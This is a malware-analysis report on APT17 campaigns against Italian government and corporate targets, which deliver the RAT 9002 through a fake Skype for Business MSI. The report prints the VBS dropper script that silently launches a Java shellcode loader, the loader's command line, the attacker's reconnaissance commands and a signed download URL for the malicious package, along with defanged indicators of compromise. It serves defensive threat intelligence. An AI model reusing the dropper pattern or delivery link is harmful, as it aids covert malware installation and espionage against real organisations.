09/07/2024
17:37

Italian government agencies and companies in the target of a Chinese APT


APT17 aka DeputyDog strikes in Italy with sophisticated campaigns that use the RAT 9002 for cyber espionage operations.
header
On June 24 and July 2, 2024, two targeted attacks on Italian companies and government entities were observed by a Chinese cyber actor exploiting a variant of the Rat 9002 in diskless mode. Other variants have over time been named as Rat 3102. These activities are associated with the APT17 group also known as "DeputyDog".

The first campaign on June 24, 2024 used an Office document, while the second campaign contained a link.
Both campaigns invited the victim to install a Skype for Business package from a link of an Italian government-like domain to convey a variant of Rat 9002.

Rat 9002 and Rat 3102 are notoriously linked to APT17, a Chinese cyber-criminal group known for:
  • Operation Aurora (attributed to the Chinese government)
  • Operation Ephemeral Hydra
  • targeted attacks on companies and government entities

The campaigns

In the figure the image of the Office document "GUIDA OPERATIVA PER l’UTENTE.docx" spreaded in the June 24, 2024 campaign.

Documento di word

The Word document was created on June 18, 2024 by a user named "ple".
The July 2 campaign instead directly uses a link to the malicious URL.
Both campaigns invite the victim to connect to the following page:

https://meeting[.]equitaligaiustizia[.]it/angelo.maisto.guest


pagina

The site mimics an official page for Equitalia Giustizia meetings and invites the user to download a customized MSI installation package for the Skype for Business software. There is also another legitimate link on the page: https://meeting[.]equitaliagiustizia[.]it/angelo.maisto.guest/MB9GVM5K which was most likely stolen/intercepted in a possible previous attack.

Malicious URL details:
DOMAIN meeting[.]equitaligaiustizia[.]it
Domain creation date 2024-06-13

By accessing the root of the site, only the "angelo.maisto.guest" subfolder is present as can be seen from the image below:
home

Instead, the malicious package is downloaded from the following Microsoft URL:

https://skypeformeeting[.]file[.]core[.]windows[.]net/skypeformeeting/SkypeMeeting.msi?sp=r&st=2024-07-04T11:10:14Z&se=2024-08-04T11:10:00Z&spr=https&sv=2022-11-02&sig=8djI9lFWxKmw5MBBk67DvQIMlyE%2F6jME24rrv0xlZs8%3D&sr=f

The custom MSI package that is downloaded has the following features:
Name: SkypeMeeting.msi
Size: 39386624 byte
SHA-256: 28808164363d221ceb9cc48f7d9dbff8ba3fc5c562f5bea9fa3176df5dd7a41e

Infection chain

In the downloaded MSI package some files to be considered interesting are the following:
  • SkypeMeetingsApp.msi (original MSI package for installing Skype for Business)
  • vcruntime.jar
  • vcruntime.vbs
  • vcruntime.bin
Below is a graph of the infection chain of the campaigns observed:
infection chain
The execution of SkypeMeeting.msi will therefore involve the installation of the original Skype for Business package and the execution of the Java application called "vcruntime.jar" via the VBS script "vcruntime.vbs" which we see below:
Set windowobj = createobject("wscript.shell")
Set Args = WScript.Arguments
strCommand1 = "java.exe -jar """ & Args(0) & """ """ & Args(1) & """ """ & Args(2) & """"
windowobj.Run strCommand1,0,False
strCommand2 = "msiexec /i  """ & Args(3) & """"
windowobj.Run strCommand2,1,False






The Java application will then be executed with the following command line:
java.exe -jar "C:\Users\<redacted>\AppData\Roaming\jre-1.8\bin\vcruntime.jar" "dwrsvsa" "C:\Users\<redacted>\AppData\Roaming\jre-1.8\bin\vcruntime.bin"

The "vcruntime.bin" file, of which we see an excerpt below, contains a shellcode encrypted with RC4:
488f162e-1aaa-060c-4ec4-c6f23c113526
4b2cbd6d-7056-b972-b13b-4c593c3b4ccc
11af7b56-c890-d2ac-3606-d8bcf19fc7a0
35381e2a-bfdd-0df3-ff41-9484f1a74fcc
112c1a02-bfd5-09d3-ff45-039758ef6aec
407e7f28-9ac5-841a-1b25-444b919f5e47
[...]
7d28f699-fb0b-d48a-b535-74419d696584
5a5be410-ded9-1e20-8ca6-c1e49ca94ecc
1178682c-613f-7e65-2100-000000000000

The Java application decrypts and executes the shellcode. Below we see the first step which involves deciphering through a simple XOR cycle:
shellcode

After decryption, the shellcode decompresses and executes the RAT 9002 as we see in the figure:
shellcode 2

The RAT 9002

The RAT 9002 performs proxy functions to monitor network traffic, see below some excerpts from the malware dump:
RAT 9002
In this first excerpt we see the command and control server.

RAT 9002
In this second excerpt we see the string "Dog create a loop thread" characteristic of the RAT 9002.

RAT 9002
In this third extract we see the name of the RAT project.
The variant of RAT 9002 analyzed contains the value "20240124" as a date indicator as seen in the figure below:
RAT 9002
This value indicates that the malware, although old, continues to be actively developed in 2024.

The RAT 9002 Trojan is a modular malware that, based on the cyber actor's needs, downloads additional diskless plugins that allow various features to be added to the malware. During the analysis of the sample in question, the criminal submitted the following additional forms:
  • ScreenSpyS.dll -> screen capture [creation date: 2018-07-19 06:27:00]
  • RemoteShellS.dll -> execution of programs [creation date: 2022-01-23 04:48:12]
  • UnInstallS.dll -> uninstallation [creation date: 2012-01-11 10:20:09]
  • FileManagerS.dll -> browse files [creation date: 2022-01-21 10:35:49]
  • ProcessS.dll -> process management [data creazione: 2022-01-22 01:37:08]
Using the RemoteShellS module, the cybercriminal executed the following commands to discover the network:
  • systeminfo.exe
  • ipconfig /all
  • net user
  • netstat -ano -p tcp
  • net use
  • net view \\<redacted_ip>
  • ping <redacted_ip> -n 1
The analyzed sample communicates with its command and control server hosted on a domain that simulates a Microsoft domain, below are the details of the C&C server:
DOMAIN themicrosoftnow[.]com
IP 137.74.76[.]92
23.218.225[.]10
PORTS 80
443
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.
Domain creation date 2023-11-27

Communication with the command and control server takes place in an encrypted manner and then encoded in Base64.

Related

Thanks to Threat intelligence activities it was possible to correlate an executable file that was uploaded to VirusTotal from Italy on 5 July 2024 which appears to be the executable file version of RAT 9002.
Name: a.exe
Size: 35328 byte
Creation date: 2024-07-04 17:02:45
SHA-256:de19e0163af15585c305f845b90262aee3c2bdf037f9fc733d3f1b379d00edd0
This sample also contains the value "20240124" as a date indicator. This sample may have been used to persist on an affected machine.

Conclusions

The two campaigns appear to be aimed at a government and/or corporate target.
The RAT 9002 used is associated with the Chinese cyber-criminal group APT17 called DeputyDog which appears to have been active since at least 2008. The malware appears to be constantly updated with diskless variants as well. It is composed of various modules that are activated as needed by the cyber actor so as to reduce the possibility of interception.
The attack as a whole is particularly sophisticated and designed down to the smallest detail, the domains used are very similar to official domains and even the creation of the malicious MSI package was carried out with care as it involves the installation of the legitimate Skype for Business software and in parallel the diskless version of the RAT 9002.
The initial MSI file is downloaded from a Microsoft distribution site to reduce the possibility of interception.
The use of legitimate links from government entities on the malicious page suggests that the cyber actor had access to confidential information of some user belonging to previously affected Italian companies or entities.

IOC:

themicrosoftnow[.]com
meeting[.]equitaligaiustizia[.]it
137[.]74[.]76[.]92
23[.]218[.]225[.]10
28808164363d221ceb9cc48f7d9dbff8ba3fc5c562f5bea9fa3176df5dd7a41e
e024fe959022d2720c1c3303f811082651aef7ed85e49c3a3113fd74f229513c
d6b348976b3c3ed880dc41bb693dc586f8d141fbc9400f5325481d0027172436
c0f93f95f004d0afd4609d9521ea79a7380b8a37a8844990e85ad4eb3d72b50c
caeca1933efcd9ff28ac81663a304ee17bbcb8091d3f9450a62c291fec973af5
de19e0163af15585c305f845b90262aee3c2bdf037f9fc733d3f1b379d00edd0

Authors: Ing. Gianfranco Tonello, Michele Zuin
Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: